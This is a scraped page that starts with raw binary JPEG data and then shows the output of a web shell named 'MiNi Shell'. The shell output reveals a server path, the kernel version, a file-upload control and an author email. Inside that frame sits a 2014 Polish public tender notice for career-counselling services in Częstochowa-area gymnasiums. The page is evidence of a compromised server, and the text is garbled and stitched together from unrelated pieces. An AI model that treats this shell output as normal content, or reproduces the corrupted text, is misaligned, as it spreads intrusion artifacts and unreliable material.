JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140213/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140213/51298-N-2014.html

<p class="kh_header"><b>Częstochowa: Świadczenie usług doradztwa zawodowego w ramach realizacji projektu Edukacja młodego pokolenia.</b><br>
<b>Numer ogłoszenia: 51298 - 2014; data zamieszczenia: 13.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rozwoju Regionalnego w Częstochowie SA , Al. Najświętszej Maryi Panny 24 lok. 8, 42-202 Częstochowa, woj. śląskie, tel. 34 3605688, faks 34 3605747.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arr.czestochowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna, akcjonariusz Gmina Miasto Częstochowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług doradztwa zawodowego w ramach realizacji projektu Edukacja młodego pokolenia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: świadczenie usług doradztwa zawodowego -  w tym: prowadzenia dyżurów w Szkolnym Ośrodku Kariery, prowadzenia warsztatów 
z zakresu doradztwa zawodowego, prowadzenia indywidualnego doradztwa zawodowego 
w gimnazjach objętych wsparciem, tj. Gimnazjum im. K.K. Baczyńskiego w Poczesnej, Gimnazjum im. Jana Kochanowskiego przy Zespole Szkół we Wrzosowej, Gimnazjum nr 1 im. Armii Krajowej w Rędzinach, Gimnazjum nr 2 przy Zespole im. Jana Pawła II w Rudnikach -  na potrzeby realizacji projektu Edukacja młodego pokolenia  w okresie od II semestru roku szkolnego 2013/2014 oraz w roku szkolnym 2014/2015 (dot. dyżurów SZOK), od I semestru roku szkolnego 2014/2015 (dot. warsztatów z zakresu doradztwa zawodowego, indywidualnego doradztwa zawodowego) - świadczonych przez podmiot spełniający wymogi Wytycznych w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki z dnia 01.07.2013r. w zakresie personelu projektu (podrozdział 2.3, punkt 6),  według których personel projektu to: osoby zaangażowane do realizacji zadań w ramach projektu, które osobiście wykonują zadania w ramach projektu, tj. w szczególności osoby zatrudnione na podstawie stosunku pracy lub stosunku cywilnoprawnego, osoby samozatrudnione, osoby fizyczne prowadzące działalność gospodarczą, osoby współpracujące w rozumieniu ustawy z dnia 13 października 1998 r. o systemie ubezpieczeń społecznych (Dz. U. z 2009 r. Nr 205, poz. 1585, z późn. zm.) oraz osoby wykonujące świadczenia w formie wolontariatu.
2.	Na podstawie art. 36a ust. 2 pkt 1 ustawy PZP Zamawiający zastrzega obowiązek osobistego wykonania przez Wykonawcę kluczowych części zamówienia, tj. świadczenie usług doradztwa zawodowego - prowadzenia dyżurów w Szkolnym Ośrodku Kariery, prowadzenia warsztatów z zakresu doradztwa zawodowego, prowadzenia indywidualnego doradztwa zawodowego w gimnazjach objętych wsparciem. Powyższe zastrzeżenie spowodowane jest specyfiką przedmiotu zamówienia i koniecznością osobistego charakteru świadczenia usługi przez personel projektu. Zgodnie z pkt 1 usługa może być bowiem świadczona przez Wykonawcę spełniającego wymogi Wytycznych w zakresie kwalifikowania wydatków w ramach Programu Operacyjnego Kapitał Ludzki z dnia 01.07.2013r. w zakresie personelu projektu (podrozdział 2.3, punkt 6), gdzie wskazano, iż personel projektu to osoby zaangażowane do realizacji zadań w ramach projektu, które osobiście wykonują zadania w ramach projektu, tj. w szczególności osoby zatrudnione na podstawie stosunku pracy lub stosunku cywilnoprawnego, osoby samozatrudnione, osoby fizyczne prowadzące działalność gospodarczą, osoby współpracujące w rozumieniu ustawy z dnia 13 października 1998 r. o systemie ubezpieczeń społecznych (Dz. U. z 2009 r. Nr 205, poz. 1585, z późn. zm.) oraz osoby wykonujące świadczenia w formie wolontariatu.
W dniu 17 czerwca 2011r. Instytucja Zarządzająca wydała stanowisko w sprawie definiowania personelu projektu, w którym stwierdzono, iż każda z form zaangażowania personelu do projektu daje możliwość kształtowania jej tak, aby pozwolić zamawiającemu (w tym przypadku: beneficjentowi) na wyegzekwowanie realizacji umowy przez konkretną, wskazaną w umowie osobę. (...) należy w sposób wyraźny i jednoznaczny nałożyć w zapisach umowy obowiązek realizacji umowy przez konkretną osobę. Jednocześnie w celu wyeliminowania wszelkich wątpliwości, co do osobistej realizacji wykonywanej przez personel projektu umowy należałoby w sposób jednoznaczny i precyzyjny wyłączyć zarówno możliwość podzlecania usług nią objętych osobom trzecim, jak i wskazać konkretną osobę, która miałaby realizować umowę. Należy także podkreślić, iż postanowienia umowy wskazujące osobę, która osobiście miałaby wykonywać zadania po stronie wykonawcy są całkowicie dopuszczalne i zgodne z obowiązującymi przepisami prawa krajowego.
3.Świadczona usługa w ramach przedmiotu zamówienia będzie polegała na bezpośredniej pracy z uczestnikami projektu, tj. świadczeniu usługi doradztwa zawodowego poprzez: 
1)	prowadzenie dyżurów w Szkolnym Ośrodku Kariery w okresie od II semestru roku szkolnego 2013/2014 oraz w roku szkolnym 2014/2015 w gimnazjach objętych wsparciem. Pełnienie dyżurów w Szkolnym Ośrodku Kariery (łącznie dla wszystkich gimnazjów przewidziano 1536 godzin lekcyjnych)  prowadzonym w jednym z gimnazjów, o których mowa w ust. 1 w ramach, których doradca zawodowy będzie:
- prowadził zadania doradcy zawodowego zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 30 kwietnia 2013 r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. z 2013 r., poz. 532);
- systematycznie diagnozował zapotrzebowania uczniów/uczennic na informacje i pomoc 
w planowaniu kształcenia i kariery zawodowej;
- gromadził, aktualizował i udostępniał informacje edukacyjne i zawodowe właściwych dla danego poziomu i kierunku kształcenia;
- wskazywał osobom zainteresowanym (młodzieży gimnazjalnej, rodzicom, nauczycielom) źródła dodatkowej, rzetelnej informacji z zakresu: rynku pracy, trendów rozwojowych 
w świecie zawodów i zatrudnienia, możliwości wykorzystania posiadanych uzdolnień i talentów w różnych obszarach świata pracy, w życiu codziennym i zawodowym, alternatywne możliwości kształcenia dla młodzieży z problemami emocjonalnymi 
i niedostosowaniem społecznym, programy edukacyjne Unii Europejskiej, porównywalności dyplomów i certyfikatów zawodowych;
-  udzielał porad edukacyjnych i zawodowych uczniom i ich rodzicom;
- prowadził grupowe zajęcia aktywizujące (warsztaty), przygotowujące uczniów do świadomego planowania kariery i podjęcia roli zawodowej;
- wspierał rodziców i nauczycieli w działaniach doradczych poprzez organizowanie spotkań szkoleniowo-informacyjnych, udostępnianie im informacji i materiałów do pracy z uczniami itp.;
- współpracował z Radą Pedagogiczną w zakresie: tworzenia i zapewnienia ciągłości działań wewnątrzszkolnego systemu doradztwa, zgodnie ze statutem szkoły, realizacji zadań z zakresu przygotowania uczniów do wyboru drogi zawodowej, zawartych w programie wychowawczym szkoły;
- prowadził dokumentację związaną z realizacją dyżurów w Szkolnym Ośrodku Kariery, 
w tym sprawozdawczość z przebiegu działań realizowanych w danym gimnazjum;
- sprawował opiekę nad uczestnikami projektu podczas wizyt studyjnych (łącznie dla wszystkich gimnazjów przewidziano 72 godziny lekcyjne);
- sprawował opiekę nad uczestnikami projektu podczas warsztatów z robotyki (łącznie dla wszystkich gimnazjów przewidziano 160 godziny lekcyjnych).
2)	prowadzenie warsztatów z zakresu doradztwa zawodowego nt. Jak wybrać szkołę po gimnazjum i/lub Moja ścieżka do kariery (łącznie dla wszystkich gimnazjów przewidziano 168 godzin zegarowych) w grupach minimum 8-osobowych, których celem  będzie pomoc uczniom/uczennicom w podejmowaniu decyzji dot. dalszego kierunku kształcenia; 
3)	prowadzenie indywidualnego doradztwa zawodowego (łącznie dla wszystkich gimnazjów przewidziano 230 godzin lekcyjnych), które będzie obejmowało porady dostosowane do potrzeb uczestników projektu odbywające się w systemie klasowym, z wykorzystaniem komputerów, na których będą przeprowadzane różnego rodzaju testy, badające predyspozycje zawodowe uczniów. Ponadto zatrudniony doradca zawodowy będzie miał obowiązek stworzenia dla uczestników projektów Indywidualnych Planów Kariery edukacyjnej i zawodowej (IPK) (łącznie dla wszystkich gimnazjów 169 sztuk).
4.	Zamawiający zapewnia pomieszczenia i sprzęt konieczny do realizacji zamówienia.
5.	Doradztwo zawodowe w formie dyżurów w Szkolnym Ośrodku Kariery będzie mogło być prowadzone od poniedziałku do soboty (w okresie od II semestrze roku szkolnego 2013/2014 oraz w roku szkolnym 2014/2015), w formie warsztatów z zakresu doradztwa zawodowego oraz indywidualnego doradztwa zawodowego będzie mogło być prowadzone od poniedziałku do soboty (w okresie roku szkolnego 2014/2015), w pomieszczeniach danego Gimnazjum udostępnionych przez dyrektora Szkoły. Zajęcia będą prowadzone w zależności od wyniku procesu rekrutacji.
6.	Kategoria przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień (CPV): 85312320-8 Usługi doradztwa.
7.	Przedmiotowe zamówienie podlega współfinansowaniu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w ramach realizacji projektu Edukacja młodego pokolenia. Informacje ogólne o tymże Projekcie można uzyskać w Agencji Rozwoju Regionalnego w Częstochowie S. A.
8.	Wartość zamówienia nie przekracza 207 000 euro.
9.	Informacje dodatkowe
1)	Zamawiający nie dopuszcza składania ofert wariantowych.
2)	Zamawiający nie przewiduje zawarcia umowy ramowej. 
3)	Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów. 
4)	Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
5)	Zamawiający nie przewiduje udzielenia zamówień uzupełniających wyłonionemu Wykonawcy usług.
6)	Zamawiający nie przewiduje udzielenia zaliczek na poczet wykonania przedmiotu zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.23.20-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 12.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. części od I, II, III, IV, V, VI, VII, VIII, IX, X, XI i XII - warunek zostanie spełniony, jeżeli Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
Ocena spełniania warunku, nastąpi wg formuły spełnia-nie spełnia na podstawie informacji zawartych w przedłożonym wraz z ofertą oświadczeniu Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust.1 pkt 1 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. części od I, II, III, IV, V, VI, VII, VIII, IX, X, XI i XII - warunek zostanie spełniony, jeżeli Wykonawca wykaże, iż  posiada wiedzę i doświadczenie w wykonywaniu tego rodzaju zamówień, tj. posiada:
-	wykształcenie wyższe magisterskie w zakresie doradztwa zawodowego lub wykształcenie wyższe magisterskie na dowolnym kierunku oraz studia podyplomowe w zakresie doradztwa zawodowego lub wykształcenie wyższe magisterskie na dowolnym kierunku oraz studia pierwszego stopnia w zakresie doradztwa zawodowego;
-	przygotowanie pedagogiczne;
-	minimum jeden rok doświadczenia pedagogicznego w pracy z uczniami/uczennicami gimnazjum;
-	znajomość specyfiki oświatowej/systemu szkolnictwa;
-	oraz jest dyspozycyjny,
a ponadto w przypadku  części: I, IV, VII, X:
-	posiada doświadczenie w prowadzeniu doradztwa zawodowego grupowego i indywidualnego z młodzieżą w wymiarze minimum: łącznie 300 godzin doradztwa grupowego i indywidualnego w  ostatnich dwóch latach;
a ponadto w przypadku  części: II, V, VIII, XI:
-	posiada doświadczenie w prowadzeniu doradztwa zawodowego grupowego z młodzieżą 
w wymiarze minimum: 150 godzin doradztwa grupowego w  ostatnich dwóch latach;
a ponadto w przypadku  części: III, VI, IX, XII:
-	posiada doświadczenie w prowadzeniu indywidualnego doradztwa zawodowego z młodzieżą w wymiarze minimum: 150 godzin doradztwa  indywidualnego w  ostatnich dwóch latach.
Ocena spełniania warunku, nastąpi wg formuły spełnia-nie spełnia na podstawie informacji zawartych w przedłożonym wraz z ofertą oświadczeniu Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust.1 pkt 2 ustawy PZP, wykazie osób uczestniczących w wykonaniu zamówienia na formularzu stanowiącym załącznik nr 3 do formularza oferty lub w oparciu o wzór formularza.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. części od I, II, III, IV, V, VI, VII, VIII, IX, X, XI i XII - warunek zostanie spełniony, jeżeli Wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, legitymującymi się doświadczeniem określonym w pkt 2.
Ocena spełniania warunku, nastąpi wg formuły spełnia-nie spełnia na podstawie informacji zawartych w przedłożonym wraz z ofertą oświadczeniu Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust.1 pkt 3 ustawy PZP</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. części od I, II, III, IV, V, VI, VII, VIII, IX, X, XI i XII - warunek zostanie spełniony, jeżeli Wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, legitymującymi się doświadczeniem określonym w pkt 2.
Ocena spełniania warunku, nastąpi wg formuły spełnia-nie spełnia na podstawie:
a)	informacji zawartych w przedłożonym wraz z ofertą oświadczeniu Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust.1 pkt 3 ustawy PZP,
b)	informacji zawartych w przedłożonym wraz z ofertą wykazie osób uczestniczących w wykonaniu zamówienia na formularzu stanowiącym załącznik nr 3 do formularza oferty lub w oparciu o wzór formularza.
Wykonawca winien wykazać, że w wykonaniu zamówienia na daną część zamówienia uczestniczyć będzie wymagana ilość osób (na część I - 1 osoba na część II - 1 osoba, na część III - 1 osoba, na część IV - 1 osoba na część V - 1 osoba, na część VI - 1 osoba, na część VII - 1 osoba, na część VIII - 1 osoba, na część IX - 1 osoba, na część X - 2 osoby, na część XI - 1 osoba, XII - 1 osoba), które posiadają kwalifikacje do prowadzenia doradztwa zawodowego zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 30 kwietnia 2013 r. w sprawie zasad udzielania i organizacji pomocy psychologiczno-pedagogicznej 
w publicznych przedszkolach, szkołach i placówkach (Dz. U. z 2013 r., poz. 532);
oraz Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 roku w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, 
w których można zatrudniać nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (t.j. Dz. U. z 2013 r., poz. 1207).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dot. części od I, II, III, IV, V, VI, VII, VIII, IX, X, XI i XII - warunek zostanie spełniony, jeżeli Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Ocena spełniania warunku, nastąpi wg formuły spełnia-nie spełnia na podstawie informacji zawartych w przedłożonym wraz z ofertą oświadczeniu Wykonawcy o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust.1 pkt 4 ustawy PZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (np. konsorcjum, spółka cywilna) stosownie do art. 23 ust. 2 ustawy PZP winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia. Dokument pełnomocnictwa musi być załączony do oferty i zawierać w szczególności wskazanie ustanowionego przez Wykonawcę - pełnomocnika oraz zakres jego umocowania oraz musi być podpisany przez wykonawców ubiegających się wspólnie o udzielenie zamówienia. Dokument pełnomocnictwa musi zostać złożony jako część oferty, w oryginale lub kopii poświadczonej za Za zgodność z oryginałem przez mocodawcę lub  notariusza</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arr.czestochowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rozwoju Regionalnego w Częstochowie S.A.
Aleja Najświętszej Maryi Panny 24 lok 6a, 42- 202 Częstochowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2014 godzina 08:00, miejsce: Agencja Rozwoju Regionalnego w Częstochowie S.A.
Aleja Najświętszej Maryi Panny 24 lok 6a, 42- 202 Częstochowa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiotowe zamówienie podlega współfinansowaniu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, w ramach realizacji projektu Edukacja młodego pokolenia; Priorytet IX; Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.; Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, Program Operacyjny Kapitał Ludzki. Informacje ogólne o tymże Projekcie można uzyskać w Agencji Rozwoju Regionalnego w Częstochowie S. A..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com